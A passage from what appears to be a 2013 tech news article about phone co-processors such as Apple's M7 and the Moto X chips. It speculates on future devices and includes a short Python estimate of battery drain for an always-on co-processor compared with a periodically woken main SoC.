Snapdragon SoC and the two co-processors, but Google has gone on the record that the co-processors are in no way married to that particular SoC. If Google and Motorola want to create a lower-cost version of the Moto X with a lesser SoC or upgrade the Moto X next year, they are free to use whatever chip they want to power most of the phone's operations. Because co-processors handle the Active Notifications and the touchless controls, Motorola won't have to throw the baby out with the bath water every time it changes SoCs. While Apple doesn't talk about its future plans, I'm pretty sure that the iPhone 5S won't be the only iDevice that picks up an M7. 
Say Apple puts out a new iPod touch next year (and it does seem to have settled into a two-year refresh cycle for that particular hardware, barring some kind of October surprise) and wants to increase its utility as a fitness device. Apple wants to increase its performance, but doesn't want to put a top-end A7 or A8 into a cheaper, lower-margin device. Keeping the M7 separate from the SoC would give the iPod maker the freedom to pair this hypothetical sixth-generation Touch with an A6, enabling those always-on features, but again not tying them to any specific chip. As others have noted, the M7 also seems like an ideal candidate for some kind of wearable computing device, where battery life is already shaping up to be an even bigger concern than it is in smartphones. Imagine the M7 paired with something like that single-core A5 that showed up in the Apple TV earlier this year, and you've got some pretty convincing smartwatch guts (assuming Apple is indeed working on such a device). Computing devices, and the chips that power them, are going to continue to become more integrated—there's no question about that. However, there are certain kinds of features where breaking something out from a monolithic SoC still makes sense, and as more and more manufacturers jump on the always-on-feature train, we're only going to see more of them.
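To see why offloading an always-on feature matters for battery life, a rough back-of-envelope model helps. The numbers below are purely illustrative assumptions (neither Apple nor Motorola publishes power figures for the M7 or the X8 co-processors), but the shape of the calculation shows why a milliwatt-class co-processor beats periodically waking the main SoC.

```python
# Back-of-envelope battery impact of an always-on sensor feature.
# All power figures and the battery size are illustrative assumptions,
# not measured values for the M7, the X8, or any specific SoC.

BATTERY_MWH = 5.7 * 1000        # ~5.7 Wh battery, expressed in mWh (assumed)
HOURS_PER_DAY = 24

def daily_drain_mwh(avg_power_mw: float) -> float:
    """Energy used per day by a block drawing avg_power_mw on average."""
    return avg_power_mw * HOURS_PER_DAY

# Scenario A: a dedicated low-power co-processor stays on all day.
coprocessor_mw = 2.0                        # assumed always-on draw
drain_coprocessor = daily_drain_mwh(coprocessor_mw)

# Scenario B: the main SoC wakes briefly every few seconds to poll the sensors.
soc_active_mw = 500.0                       # assumed draw while awake
wake_seconds, period_seconds = 0.05, 2.0    # 50 ms of work every 2 s (assumed)
duty_cycle = wake_seconds / period_seconds
drain_soc = daily_drain_mwh(soc_active_mw * duty_cycle)

for name, drain in [("co-processor", drain_coprocessor), ("waking main SoC", drain_soc)]:
    print(f"{name:16s}: {drain:6.0f} mWh/day "
          f"({100 * drain / BATTERY_MWH:.1f}% of the battery)")
```

The exact figures will vary wildly by chip and workload, and the model ignores the baseline sleep draw of the rest of the system, but the structure of the result is part of why chips like the M7 and the X8's contextual and language processors exist: a few milliwatts running continuously costs far less over a day than repeatedly spinning up the application processor.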
<urn:uuid:afcadd26-1d81-4285-b4cc-6bc73464584e>
CC-MAIN-2017-09
https://arstechnica.com/gadgets/2013/09/the-iphone-5s-the-moto-x-and-the-rise-of-the-co-processor/?comments=1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00105-ip-10-171-10-108.ec2.internal.warc.gz
en
0.965645
1,063
2.921875
3